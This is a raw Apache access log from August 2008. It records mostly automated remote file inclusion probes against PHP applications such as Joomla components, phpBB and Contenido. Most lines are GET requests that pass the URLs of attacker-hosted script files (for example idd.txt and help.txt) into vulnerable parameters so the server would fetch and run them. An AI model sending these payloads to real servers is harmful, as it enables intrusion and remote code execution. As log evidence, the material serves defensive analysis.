82.194.76.177 - - [24/Aug/2008:08:54:12 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://lipuu.com/tool/chid.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
82.194.76.177 - - [24/Aug/2008:08:54:15 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://lipuu.com/tool/chid.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
82.194.76.177 - - [24/Aug/2008:08:54:21 -0500] "GET /logs/access_log.1213401600//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://lipuu.com/tool/chid.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
74.55.246.194 - - [24/Aug/2008:08:54:28 -0500] "GET /logs/access_log.1206230400//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.yallaweb.net/images/grey/tbl/DEVILS/help.txt? HTTP/1.1" 404 355 "-""libwww-perl/5.814"
74.55.246.194 - - [24/Aug/2008:08:54:45 -0500] "GET /logs/access_log.1206230400//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.yallaweb.net/images/grey/tbl/DEVILS/help.txt? HTTP/1.1" 404 355 "-""libwww-perl/5.814"
66.40.56.32 - - [24/Aug/2008:08:55:05 -0500] "GET /logs/access_log.1214784000/errors.php?error=http://www.saren-first.com/images/n.txt??%0D?? HTTP/1.1" 404 321 "-""libwww-perl/5.811"
91.200.212.3 - - [24/Aug/2008:08:55:18 -0500] "GET /logs/access_log.1208044800///vwar/backup/errors.php?error=http://www.tiibetinspanielit.fi/forum/ids.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.803"
89.208.43.121 - - [24/Aug/2008:08:55:51 -0500] "GET /logs//errors.php?error=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
89.208.43.121 - - [24/Aug/2008:08:55:51 -0500] "GET //errors.php?error=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
217.172.186.250 - - [24/Aug/2008:08:56:01 -0500] "GET /logs/access_log.1214179200//?custompluginfile%5B%5D=http://www.yallaweb.net/images/grey/tbl/DEVILS/help.txt? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
217.172.186.250 - - [24/Aug/2008:08:56:01 -0500] "GET /logs/access_log.1214179200//?custompluginfile%5B%5D==http://www.yallaweb.net/images/grey/tbl/DEVILS/help.txt? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
217.172.186.250 - - [24/Aug/2008:08:56:01 -0500] "GET //?custompluginfile%5B%5D=http://www.yallaweb.net/images/grey/tbl/DEVILS/help.txt? HTTP/1.1" 200 1243 "-""libwww-perl/5.803"
217.172.186.250 - - [24/Aug/2008:08:56:01 -0500] "GET //?custompluginfile%5B%5D==http://www.yallaweb.net/images/grey/tbl/DEVILS/help.txt? HTTP/1.1" 200 1243 "-""libwww-perl/5.803"
217.172.186.250 - - [24/Aug/2008:08:56:02 -0500] "GET /logs//?custompluginfile%5B%5D=http://www.yallaweb.net/images/grey/tbl/DEVILS/help.txt? HTTP/1.1" 200 96475 "-""libwww-perl/5.803"
217.172.186.250 - - [24/Aug/2008:08:56:02 -0500] "GET /logs//?custompluginfile%5B%5D==http://www.yallaweb.net/images/grey/tbl/DEVILS/help.txt? HTTP/1.1" 200 96475 "-""libwww-perl/5.803"
217.172.186.250 - - [24/Aug/2008:08:56:06 -0500] "GET /logs/access_log.1214179200//?custompluginfile[]=http://www.yallaweb.net/images/grey/tbl/DEVILS/help.txt? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
217.172.186.250 - - [24/Aug/2008:08:56:06 -0500] "GET //?custompluginfile[]=http://www.yallaweb.net/images/grey/tbl/DEVILS/help.txt? HTTP/1.1" 200 1243 "-""libwww-perl/5.803"
217.172.186.250 - - [24/Aug/2008:08:56:07 -0500] "GET /logs//?custompluginfile[]=http://www.yallaweb.net/images/grey/tbl/DEVILS/help.txt? HTTP/1.1" 200 96475 "-""libwww-perl/5.803"
89.208.43.121 - - [24/Aug/2008:08:56:11 -0500] "GET //errors.php?error=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
216.17.107.161 - - [24/Aug/2008:08:56:12 -0500] "GET /logs//admin/classes/errors.php?error=http://frauenaerzte-bamberg.de/news/parse/v6id.txt???? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
216.17.107.161 - - [24/Aug/2008:08:56:12 -0500] "GET //admin/classes/errors.php?error=http://frauenaerzte-bamberg.de/news/parse/v6id.txt???? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
89.208.43.121 - - [24/Aug/2008:08:56:13 -0500] "GET /logs//errors.php?error=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
89.208.43.121 - - [24/Aug/2008:08:56:13 -0500] "GET //errors.php?error=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
208.97.183.24 - - [24/Aug/2008:08:56:23 -0500] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://www.battle-elite.de/be_inside/images/cicons/arab.txt? HTTP/1.1" 404 369 "-""libwww-perl/5.803"
208.97.183.24 - - [24/Aug/2008:08:56:23 -0500] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://www.battle-elite.de/be_inside/images/cicons/arab.txt? HTTP/1.1" 404 364 "-""libwww-perl/5.803"
216.17.107.161 - - [24/Aug/2008:08:56:43 -0500] "GET /logs//admin/classes/errors.php?error=http://frauenaerzte-bamberg.de/news/parse/v6id.txt???? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
216.17.107.161 - - [24/Aug/2008:08:56:43 -0500] "GET //admin/classes/errors.php?error=http://frauenaerzte-bamberg.de/news/parse/v6id.txt???? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
81.26.209.159 - - [24/Aug/2008:08:56:54 -0500] "GET /logs/errors.php?error=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
81.26.209.159 - - [24/Aug/2008:08:56:54 -0500] "GET /errors.php?error=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
82.194.76.177 - - [24/Aug/2008:08:57:39 -0500] "GET /errors.php?error=http://audi.spb.ru/img/gal/2008/bot.txt?? HTTP/1.1" 404 294 "-""Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)"
82.194.76.177 - - [24/Aug/2008:08:57:40 -0500] "GET /logs/errors.php?error=http://audi.spb.ru/img/gal/2008/bot.txt?? HTTP/1.1" 404 299 "-""Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)"
64.22.89.194 - - [24/Aug/2008:08:57:43 -0500] "GET /logs/access_log.1214524800/includes/ktedit/toolbar.php?dirDepth=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.812"
67.212.173.42 - - [24/Aug/2008:08:58:33 -0500] "GET /logs/errors.php?error=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.811"
67.212.173.42 - - [24/Aug/2008:08:58:33 -0500] "GET /errors.php?error=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.811"
70.85.201.66 - - [24/Aug/2008:08:58:52 -0500] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://www.battle-elite.de/be_inside/images/cicons/id2.txt?? HTTP/1.1" 404 369 "-""libwww-perl/5.811"
70.85.201.66 - - [24/Aug/2008:08:58:52 -0500] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://www.battle-elite.de/be_inside/images/cicons/id2.txt?? HTTP/1.1" 404 364 "-""libwww-perl/5.811"
89.208.43.121 - - [24/Aug/2008:08:59:07 -0500] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 332 "-""libwww-perl/5.805"
89.208.43.121 - - [24/Aug/2008:08:59:08 -0500] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
89.208.43.121 - - [24/Aug/2008:08:59:28 -0500] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 332 "-""libwww-perl/5.805"
89.208.43.121 - - [24/Aug/2008:08:59:28 -0500] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
89.208.43.121 - - [24/Aug/2008:09:00:08 -0500] "GET /logs/access_log.1205366400/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 371 "-""libwww-perl/5.805"
89.208.43.121 - - [24/Aug/2008:09:00:09 -0500] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 344 "-""libwww-perl/5.805"
89.208.43.121 - - [24/Aug/2008:09:00:09 -0500] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 349 "-""libwww-perl/5.805"
217.172.186.250 - - [24/Aug/2008:09:00:43 -0500] "GET /logs/access_log.1214179200//?custompluginfile%5B%5D==http://www.yallaweb.net/images/grey/tbl/DEVILS/help.txt? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
217.172.186.250 - - [24/Aug/2008:09:00:44 -0500] "GET //?custompluginfile%5B%5D==http://www.yallaweb.net/images/grey/tbl/DEVILS/help.txt? HTTP/1.1" 200 1243 "-""libwww-perl/5.803"
217.172.186.250 - - [24/Aug/2008:09:00:45 -0500] "GET /logs//?custompluginfile%5B%5D==http://www.yallaweb.net/images/grey/tbl/DEVILS/help.txt? HTTP/1.1" 200 96475 "-""libwww-perl/5.803"
89.208.43.121 - - [24/Aug/2008:09:00:54 -0500] "GET /logs/access_log.1205366400//errors.php?error=http://www.sldating.fr/idd.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
89.208.43.121 - - [24/Aug/2008:09:00:54 -0500] "GET //errors.php?error=http://www.sldating.fr/idd.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
89.208.43.121 - - [24/Aug/2008:09:01:04 -0500] "GET /logs//errors.php?error=http://www.sldating.fr/idd.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
89.208.43.121 - - [24/Aug/2008:09:02:52 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
89.208.43.121 - - [24/Aug/2008:09:02:53 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
69.94.70.15 - - [24/Aug/2008:09:04:19 -0500] "GET /logs/access_log.1214438400//modules/xfsection/modify.php?dir_module=http://www.teamprobes.net/id.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.65"
217.128.122.28 - - [24/Aug/2008:09:04:35 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.fullscores.com/mambots/poll/osid6.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.803"
217.128.122.28 - - [24/Aug/2008:09:04:36 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.fullscores.com/mambots/poll/osid6.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.803"
70.87.139.98 - - [24/Aug/2008:09:05:41 -0500] "GET /logs/access_log.1206230400/errors.php?error=http://www.hhaynes.com/.smileys/smiley17.gif?? HTTP/1.1" 404 321 "-""libwww-perl/5.811"
70.87.139.98 - - [24/Aug/2008:09:05:41 -0500] "GET /errors.php?error=http://www.hhaynes.com/.smileys/smiley17.gif?? HTTP/1.1" 404 294 "-""libwww-perl/5.811"
70.87.139.98 - - [24/Aug/2008:09:05:41 -0500] "GET /logs/errors.php?error=http://www.hhaynes.com/.smileys/smiley17.gif?? HTTP/1.1" 404 299 "-""libwww-perl/5.811"
74.202.49.162 - - [24/Aug/2008:09:06:33 -0500] "GET /logs/access_log.1206230400//claroline/phpbb/page_tail.php?includePath=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/nid.txt?? HTTP/1.1" 404 341 "-""libwww-perl/5.805"
74.202.49.162 - - [24/Aug/2008:09:06:33 -0500] "GET //claroline/phpbb/page_tail.php?includePath=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/nid.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
74.202.49.162 - - [24/Aug/2008:09:06:33 -0500] "GET /logs//claroline/phpbb/page_tail.php?includePath=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/nid.txt?? HTTP/1.1" 404 319 "-""libwww-perl/5.805"
70.87.139.98 - - [24/Aug/2008:09:06:52 -0500] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.hhaynes.com/.smileys/smiley17.gif?? HTTP/1.1" 404 355 "-""libwww-perl/5.811"
70.87.139.98 - - [24/Aug/2008:09:06:53 -0500] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.hhaynes.com/.smileys/smiley17.gif?? HTTP/1.1" 404 350 "-""libwww-perl/5.811"
70.87.139.98 - - [24/Aug/2008:09:07:02 -0500] "GET /logs/access_log.1208044800/errors.php?error=http://www.hhaynes.com/.smileys/smiley17.gif?? HTTP/1.1" 404 321 "-""libwww-perl/5.811"
212.67.202.195 - - [24/Aug/2008:09:07:45 -0500] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://bmbblend.com.ua//id.txt? HTTP/1.1" 404 333 "-""libwww-perl/5.68"
212.67.202.195 - - [24/Aug/2008:09:07:45 -0500] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://bmbblend.com.ua//id.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.68"
213.168.176.11 - - [24/Aug/2008:09:08:13 -0500] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.hhaynes.com/.smileys/smiley17.gif?? HTTP/1.1" 404 355 "-""libwww-perl/5.805"
213.168.176.11 - - [24/Aug/2008:09:08:13 -0500] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.hhaynes.com/.smileys/smiley17.gif?? HTTP/1.1" 404 350 "-""libwww-perl/5.805"
202.160.123.134 - - [24/Aug/2008:09:08:35 -0500] "GET /?view=page&pagename=http://hortus-alere.dyndns.org/Home/components/com_frontpage/test.txt??? HTTP/1.1" 200 1243 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
67.195.37.156 - - [24/Aug/2008:09:08:41 -0500] "GET /costume/links.htm HTTP/1.0" 200 1029 "-""Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20080721 BonEcho/2.0.0.4"
213.168.176.11 - - [24/Aug/2008:09:11:11 -0500] "GET /logs/access_log.1206230400/errors.php?error=http://www.hhaynes.com/.smileys/smiley17.gif?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
213.168.176.11 - - [24/Aug/2008:09:11:11 -0500] "GET /errors.php?error=http://www.hhaynes.com/.smileys/smiley17.gif?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
213.168.176.11 - - [24/Aug/2008:09:11:12 -0500] "GET /logs/errors.php?error=http://www.hhaynes.com/.smileys/smiley17.gif?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.208.43.121 - - [24/Aug/2008:09:12:31 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
89.208.43.121 - - [24/Aug/2008:09:12:31 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
213.168.176.11 - - [24/Aug/2008:09:12:45 -0500] "GET /logs/access_log.1208044800/errors.php?error=http://www.hhaynes.com/.smileys/smiley17.gif?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
89.208.43.121 - - [24/Aug/2008:09:12:50 -0500] "GET /logs//errors.php?error=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
89.208.43.121 - - [24/Aug/2008:09:12:50 -0500] "GET //errors.php?error=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
89.208.43.121 - - [24/Aug/2008:09:13:36 -0500] "GET /logs//errors.php?error=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
89.208.43.121 - - [24/Aug/2008:09:13:37 -0500] "GET //errors.php?error=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
89.208.43.121 - - [24/Aug/2008:09:15:42 -0500] "GET /logs/access_log.1206230400/modules/My_eGallery/index.php?basepath=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
89.208.43.121 - - [24/Aug/2008:09:15:43 -0500] "GET /modules/My_eGallery/index.php?basepath=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
89.208.43.121 - - [24/Aug/2008:09:15:43 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
74.6.8.121 - - [24/Aug/2008:09:15:54 -0500] "GET / HTTP/1.0" 200 1231 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
217.172.186.250 - - [24/Aug/2008:09:16:15 -0500] "GET /logs/access_log.1193011200/index.php?go=http://www.yallaweb.net/images/grey/tbl/DEVILS/help.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.803"
216.17.107.161 - - [24/Aug/2008:09:18:25 -0500] "GET /logs/access_log.1206230400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.arisukoyu.org.tr/forum/Smileys/v6id.txt?? HTTP/1.1" 404 365 "-""libwww-perl/5.79"
216.17.107.161 - - [24/Aug/2008:09:18:25 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.arisukoyu.org.tr/forum/Smileys/v6id.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.79"
216.17.107.161 - - [24/Aug/2008:09:18:26 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.arisukoyu.org.tr/forum/Smileys/v6id.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.79"
216.17.107.161 - - [24/Aug/2008:09:18:56 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://frauenaerzte-bamberg.de/news/parse/v6id.txt???? HTTP/1.1" 404 338 "-""libwww-perl/5.79"
216.17.107.161 - - [24/Aug/2008:09:18:56 -0500] "GET /logs/access_log.1206230400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://frauenaerzte-bamberg.de/news/parse/v6id.txt???? HTTP/1.1" 404 365 "-""libwww-perl/5.79"
216.17.107.161 - - [24/Aug/2008:09:18:56 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://frauenaerzte-bamberg.de/news/parse/v6id.txt???? HTTP/1.1" 404 343 "-""libwww-perl/5.79"
216.17.107.161 - - [24/Aug/2008:09:19:17 -0500] "GET /logs/access_log.1206230400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://frauenaerzte-bamberg.de/news/parse/v6id.txt???? HTTP/1.1" 404 365 "-""libwww-perl/5.79"
216.17.107.161 - - [24/Aug/2008:09:19:17 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://frauenaerzte-bamberg.de/news/parse/v6id.txt???? HTTP/1.1" 404 343 "-""libwww-perl/5.79"
216.17.107.161 - - [24/Aug/2008:09:19:17 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://frauenaerzte-bamberg.de/news/parse/v6id.txt???? HTTP/1.1" 404 338 "-""libwww-perl/5.79"
89.208.43.121 - - [24/Aug/2008:09:19:28 -0500] "GET /logs/access_log.1211500800/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.sldating.fr/idd.txt?? HTTP/1.1" 404 371 "-""libwww-perl/5.805"
67.202.88.42 - - [24/Aug/2008:09:22:22 -0500] "GET /logs/errors.php?error=http://www.topyn.com/ips.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
67.202.88.42 - - [24/Aug/2008:09:22:22 -0500] "GET /errors.php?error=http://www.topyn.com/ips.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
64.34.171.29 - - [24/Aug/2008:09:22:44 -0500] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.skkulove.com//bbs/c_h_i_t_o_z.txt? HTTP/1.1" 404 297 "-""libwww-perl/5.79"
64.34.171.29 - - [24/Aug/2008:09:22:44 -0500] "GET /e404.php?DOCUMENT_ROOT=http://www.skkulove.com//bbs/c_h_i_t_o_z.txt? HTTP/1.1" 404 292 "-""libwww-perl/5.79"
216.17.107.161 - - [24/Aug/2008:09:22:53 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.arisukoyu.org.tr/forum/Smileys/v6id.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.79"
62.65.159.210 - - [24/Aug/2008:09:23:06 -0500] "GET /logs/access_log.1214179200/bookmark4u/lostpasswd.php?env[include_prefix]=http://www.yallaweb.net/images/grey/tbl/DEVILS/help.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.76"
62.65.159.210 - - [24/Aug/2008:09:23:07 -0500] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://www.yallaweb.net/images/grey/tbl/DEVILS/help.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.76"
62.65.159.210 - - [24/Aug/2008:09:23:07 -0500] "GET /logs/bookmark4u/lostpasswd.php?env[include_prefix]=http://www.yallaweb.net/images/grey/tbl/DEVILS/help.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.76"
216.17.107.161 - - [24/Aug/2008:09:23:57 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://frauenaerzte-bamberg.de/news/parse/v6id.txt???? HTTP/1.1" 404 338 "-""libwww-perl/5.79"
216.17.107.161 - - [24/Aug/2008:09:24:17 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://frauenaerzte-bamberg.de/news/parse/v6id.txt???? HTTP/1.1" 404 338 "-""libwww-perl/5.79"
89.208.43.121 - - [24/Aug/2008:09:26:32 -0500] "GET /logs//errors.php?error=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
89.208.43.121 - - [24/Aug/2008:09:26:33 -0500] "GET //errors.php?error=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
89.208.43.121 - - [24/Aug/2008:09:26:56 -0500] "GET /logs//errors.php?error=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
89.208.43.121 - - [24/Aug/2008:09:26:57 -0500] "GET //errors.php?error=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
89.208.43.121 - - [24/Aug/2008:09:28:11 -0500] "GET /logs/access_log.1211500800/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 371 "-""libwww-perl/5.805"
80.67.23.3 - - [24/Aug/2008:09:29:30 -0500] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://sunshineaviation.com/osticket/id.txt%0D?? HTTP/1.1" 404 332 "-""libwww-perl/5.808"
80.67.23.3 - - [24/Aug/2008:09:29:30 -0500] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://sunshineaviation.com/osticket/id.txt%0D?? HTTP/1.1" 404 337 "-""libwww-perl/5.808"
81.9.63.18 - - [24/Aug/2008:09:31:26 -0500] "GET /logs//atom.php5?page=http://sexywomenonly.com/home/groups/orca/log/memei.jpg? HTTP/1.1" 404 299 "-""libwww-perl/5.811"
81.9.63.18 - - [24/Aug/2008:09:31:27 -0500] "GET //atom.php5?page=http://sexywomenonly.com/home/groups/orca/log/memei.jpg? HTTP/1.1" 404 294 "-""libwww-perl/5.811"
89.208.43.121 - - [24/Aug/2008:09:34:42 -0500] "GET /logs/access_log.1214179200%20/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.sldating.fr/idd.txt?? HTTP/1.1" 404 372 "-""libwww-perl/5.805"
64.22.89.194 - - [24/Aug/2008:09:37:13 -0500] "GET /logs/access_log.1209081600/libro/admin.php?include_path=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 326 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
64.22.89.194 - - [24/Aug/2008:09:37:13 -0500] "GET /libro/admin.php?include_path=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 299 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
64.22.89.194 - - [24/Aug/2008:09:37:21 -0500] "GET /logs/libro/admin.php?include_path=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 304 "-""libwww-perl/5.812"
64.22.89.194 - - [24/Aug/2008:09:37:21 -0500] "GET /logs/libro/admin.php?include_path=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 304 "-""libwww-perl/5.812"
64.22.89.194 - - [24/Aug/2008:09:37:21 -0500] "GET /libro/admin.php?include_path=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.812"
64.22.89.194 - - [24/Aug/2008:09:37:21 -0500] "GET /libro/admin.php?include_path=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.812"
64.22.89.194 - - [24/Aug/2008:09:37:31 -0500] "GET /logs/access_log.1209081600/libro/admin.php?include_path=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.812"
64.22.89.194 - - [24/Aug/2008:09:37:31 -0500] "GET /libro/admin.php?include_path=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.812"
64.22.89.194 - - [24/Aug/2008:09:37:31 -0500] "GET /logs/libro/admin.php?include_path=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 304 "-""libwww-perl/5.812"
81.9.63.18 - - [24/Aug/2008:09:37:56 -0500] "GET /logs//atom.php5?page=http://www.hladogen.ru/project_files/memei.jpg? HTTP/1.1" 404 299 "-""libwww-perl/5.811"
81.9.63.18 - - [24/Aug/2008:09:37:56 -0500] "GET //atom.php5?page=http://www.hladogen.ru/project_files/memei.jpg? HTTP/1.1" 404 294 "-""libwww-perl/5.811"
89.208.43.121 - - [24/Aug/2008:09:38:18 -0500] "GET /logs/access_log.1211500800//errors.php?error=http://www.sldating.fr/idd.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
62.212.130.16 - - [24/Aug/2008:09:41:20 -0500] "GET ///vwar/backup/errors.php?error=http://fratore.altervista.org/ufficio/tommy.txt? HTTP/1.1" 404 308 "-""Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
62.212.130.16 - - [24/Aug/2008:09:41:20 -0500] "GET /logs///vwar/backup/errors.php?error=http://fratore.altervista.org/ufficio/tommy.txt? HTTP/1.1" 404 313 "-""Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
70.84.182.98 - - [24/Aug/2008:09:45:25 -0500] "GET /?custompluginfile[]=http://superspeedlearning.com/test.txt? HTTP/1.1" 200 1243 "-""Microsoft Pocket Internet Explorer/0.6"
70.84.182.98 - - [24/Aug/2008:09:45:26 -0500] "GET /logs/?custompluginfile[]=http://superspeedlearning.com/test.txt? HTTP/1.1" 200 96470 "-""Microsoft Pocket Internet Explorer/0.6"
